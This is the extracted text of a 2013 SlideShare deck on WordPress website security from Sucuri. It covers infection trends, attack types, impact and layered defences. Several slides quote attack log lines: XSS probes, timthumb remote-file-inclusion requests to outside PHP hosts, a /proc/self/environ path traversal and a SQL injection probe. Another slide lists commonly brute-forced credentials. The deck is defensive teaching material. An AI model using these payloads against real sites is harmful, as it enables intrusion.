Word press website security

3,482 views

Published on

0 Comments
4 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,482
On SlideShare
0
From Embeds
0
Number of Embeds
5
Actions
Shares
0
Downloads
8
Comments
0
Likes
4
Embeds 0
No embeds

No notes for slide

Word press website security

  1. 1. WordPressWebsite Security
  2. 2.  Specialization: Website Security Incident Handling LogAnalysis Special Interests: Warfare Weapons Martial ArtsTony Perez | @perezbox | @sucuri_security5/1/2013 2
  3. 3.  Website Security Company GlobalOperations AllWebsite Platforms Scan 1M Unique Domains a Month Block 1M web attacks a Month 300 – 500 websites a day Signature / Heuristic Based 24/5 - 18/2 operations5/1/2013 Tony Perez | @perezbox | @sucuri_security 3
  4. 4.  Trends Threats Defenses5/1/2013 Tony Perez | @perezbox | @sucuri_security 4SIMPLE RIGHT?
  5. 5. Tony Perez | @perezbox | @sucuri_security5/1/2013 5
  6. 6. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 6Malicious Links20112012
  7. 7. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 7
  8. 8. Known MalwareUnkown Malware5/1/2013 Tony Perez | @perezbox | @sucuri_security 8
  9. 9. Not InfectedInfected5/1/2013 Tony Perez | @perezbox | @sucuri_security 9
  10. 10. 26%19%16%14%11%4%10%Remote iFrameIncludesRemoteJavaScriptIncludesSPAMInjectionsObfuscated /EncodedJavaScriptConditionalRedirectsDefacements Other5/1/2013 Tony Perez | @perezbox | @sucuri_security 10
  11. 11. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 11Apache SSHEmailServer Going Deeper than the application layer, targeting theserver. Server Polymorphism – a.k.a changes a lot
  12. 12.  StickWith ReputableSources Gravity Forms JetPack Forms Generating SPAMemails, resource hogs IP blacklisting LeverageCaptchas5/1/2013 Tony Perez | @perezbox | @sucuri_security 12
  13. 13. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 13
  14. 14.  Pharmacy Payday Loans5/1/2013 Tony Perez | @perezbox | @sucuri_security 14
  15. 15. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 15 Access – so easy, yet so weak
  16. 16. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 16
  17. 17. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 17
  18. 18. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 18Site 1Site 2Site 3Site 4WordPress 2.8WordPress 3.5.1WordPress 3.4.2WordPress 3.0
  19. 19. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 19
  20. 20. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 20
  21. 21. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 21
  22. 22. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 22
  23. 23. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 23
  24. 24. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 24
  25. 25.  W3TC &WP Super Cache Remote Command Execution (RCE)Vulnerability WPMM SPAM Injections (Bad Plugin) Social MediaWidget SPAM Injections (Core Commit)5/1/2013 Tony Perez | @perezbox | @sucuri_security 25
  26. 26.  Explosion in the Malwareas a Service (MaaS) trade Yes, pay someone to hackfor you Different tools to breakin and generate payloads Brute force andvulnerability exploitsMalware Payloads Blackhole Exploit Kit –Today’s market leader 2013 – SophoLabs5/1/2013 Tony Perez | @perezbox | @sucuri_security 26
  27. 27. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 27
  28. 28. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 28
  29. 29. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 29
  30. 30. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 30 Use for malware? Burrow into network? Steal data?What kind of website do you have?
  31. 31. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 3138.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0;Windows NT 5.1; Trident/4.0)"123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3EHTTP/1.1" 404 268 Stored Reflective
  32. 32. [02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.phpHTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0”83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET/results/chinchedbistro.com&amp;sa=U&amp;ei=vGBcUYS1IcOaiQLxu4HIBg&amp;ved=0CCYQFjAE&amp;usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6”82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET/?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U;Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"5/1/2013 Tony Perez | @perezbox | @sucuri_security 32
  33. 33. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 3362.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us)Firefox/3.5.9”
  34. 34. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 34
  35. 35. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 35
  36. 36.  Brand Reputation Legal Implications Impact to Sales Blacklisted by SearchEngines Blacklisted by Paymentprocessors Worst Day Of your Life5/1/2013 Tony Perez | @perezbox | @sucuri_security 36
  37. 37. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 37
  38. 38.  Access Control Vulnerabilities Hosting Online Habits Social Media Passwords5/1/2013 Tony Perez | @perezbox | @sucuri_security 38
  39. 39. “It’s about risk reduction… risk will never bezero…”5/1/2013 Tony Perez | @perezbox | @sucuri_security 39
  40. 40.  We run on WordPress CurrentVersion of course Sucuri properties suffer: ~125,000 web basedattacks a month onaverage ~4,000 attacks a day▪ This spikes on occasion Doesn’t include serverlevel attacks All flavors of attacks5/1/2013 Tony Perez | @perezbox | @sucuri_security 40
  41. 41.  Instead of telling you what you need to do, I’ll justtell you what we do; Our philosophy and approach is verysimple, complex things break in complex ways; We focus on the areas that we can immediatelycontrol; We believe in layered defenses;5/1/2013 Tony Perez | @perezbox | @sucuri_security 41
  42. 42. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 42Stay CurrentIPWhitelistingTwo Factor AuthenticationStrong / Unique PasswordWeb Application Firewall
  43. 43. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 43IPWhitelistingServer IsolationPublic Key AuthenticationHost Intrusion Detection System (HIDS)Log Everything
  44. 44. Category Tool TypePrevention – SoftwareVulnerabilities Sucuri CloudProxy ServicePrevention – Access Control Sucuri CloudProxy ServiceDetection Sucuri Monitoring ServiceRemediation Sucuri ServicePassword Management 1Password / LastPass ApplicationHost-based Intrusion Detection System OSSEC ApplicationAccess Control Enforcement Login Secure Solutions PluginTwo-Factor Authentication Google Authenticator PluginApplication Auditing Sucuri Premium PluginBackups BackupBuddy Plugin5/1/2013 Tony Perez | @perezbox | @sucuri_security 44
  45. 45. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 45Category Location TypeDisableTheme / PluginEditorwp-config.php Preventive measureDisable PHP execution .htacces – uploads / images/ wp-includes / etc..Preventive measurePermissions Directories 755 / Files 644 Preventive measure
  46. 46. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 46• Don’t know what you’re doing?• Go with a managed host…
  47. 47. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 47Doesn’t mean you won’t ever get infected.
  48. 48. Complex . Long . Unique . Esoteric“CLUE”5/1/2013 Tony Perez | @perezbox | @sucuri_security 48652,911 [log] => admin10173 [log] => test8992 [log] => administrator8921 [log] => Admin2495 [log] => root16,798 [pwd] => admin10,880 [pwd] => 1234569,727 [pwd] => 6666669,106 [pwd] => 1111117,882 [pwd] => 123456787,717 [pwd] => qwerty7,295 [pwd] => 1234567USERNAMES PASSWORDSEpic Fail
  49. 49.  Access Login Secure Solution Stealth Login Limit Login Scanning WordFence Anti-Malwatch Defense in Depth BetterWP Security BulletProof Security Vulnerabilities MVIS Security Center5/1/2013 Tony Perez | @perezbox | @sucuri_security 49
  50. 50. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 50Name ToolSucuri Blog http://blog.sucuri.netSucuriTV http://sucuri.tvWordPress Forum – Hacked http://wordpress.org/tags/hackedWordPress Forum – Malware http://wordpress.org/tags/malwareBadware Busters https://badwarebusters.orgPerishable Press http://perishablepress.com/category/web-design/security/Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sitesWordPress.org Hardening http://codex.wordpress.org/Hardening_WordPressGoogleWebmasterTools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633Secunia SecurityAdvisories http://secunia.com/community/advisories/search/?search=wordpressExploit-DB http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
  51. 51. 5/1/2013 Tony Perez | @perezbox | @sucuri_security 51

×